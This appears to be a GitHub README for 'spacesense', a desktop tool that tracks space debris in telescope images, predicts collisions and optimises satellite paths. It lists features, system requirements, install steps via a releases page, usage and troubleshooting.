spacesense is an AI system designed to process telescope images. It tracks space debris, predicts potential collisions, and optimizes satellite trajectories using advanced reinforcement learning techniques. This application aims to enhance orbital safety for satellites and other spacecraft in our ever-crowded skies.
- Track Space Debris: Monitor and identify debris in real time to prevent collisions.
- Predict Collisions: Receive alerts about potential collision threats to satellites.
- Optimize Satellite Paths: Adjust satellite trajectories intelligently using reinforcement learning.
- User-Friendly Interface: Simple and intuitive design allows for easy navigation.
- Compatibility: Works seamlessly with various telescope imagery formats.
To run spacesense smoothly, ensure your system meets the following requirements:
- Operating System: Windows 10 or later, macOS 10.15 or later
- Processor: Intel i5 or AMD equivalent
- Memory: At least 8 GB of RAM
- Storage: Minimum 500 MB of free disk space
- Graphics Card: Dedicated GPU (NVIDIA or AMD) with OpenCV support
Follow these simple steps to download and install spacesense.
Click on the link below to access the latest release of spacesense. This page contains the downloadable files you need. Visit the Releases Page
On the Releases page, locate the latest version of spacesense. Click on the name of the file to download it to your computer.
Once the download is complete, locate the downloaded file on your system. Double-click the file to start the installation. Follow the on-screen instructions to install the application.
After installation, find spacesense in your application list or on your desktop. Double-click to open the application. You’re now ready to track space debris!
After launching spacesense, follow these steps:
- Upload Telescope Imagery: Click on the 'Upload' button and select images from your files.
- Select Tracking Parameters: Choose the parameters for tracking space debris by adjusting the settings in the sidebar.
- Start Tracking: Click the 'Start' button to begin processing. The application will analyze the imagery and display results in real time.
- View Predictions: Check the alerts and predictions generated by the system regarding possible collisions and satellite path optimization.
If you encounter issues, here are common solutions:
- Installation Fails: Check that your system meets the requirements listed above.
- Application Crashes: Ensure you have the latest graphics drivers installed. Restart your computer and try again.
- Loading Issues: Make sure your telescope imagery files are in a supported format (JPEG, PNG).
For assistance or questions, please open an issue on the GitHub repository. We encourage users to report bugs or request features. Your feedback helps us improve spacesense!
Don’t forget to check the Releases Page for updates to the application.
Thanks to community contributors and researchers in aerospace and computer vision fields for their valuable input. Your support aids the development of spacesense and makes space tracking safer for everyone.
- aerospace
- aerospace-engineering
- astro-informatics
- computer-vision
- computer-vision-algorithms
- computer-vision-opencv
- orbital-mechanics
- reinforcement-learning
- reinforcement-learning-algorithms
- satellite-management
- space-tech
- space-technology
We hope you find spacesense helpful in tracking and managing space debris!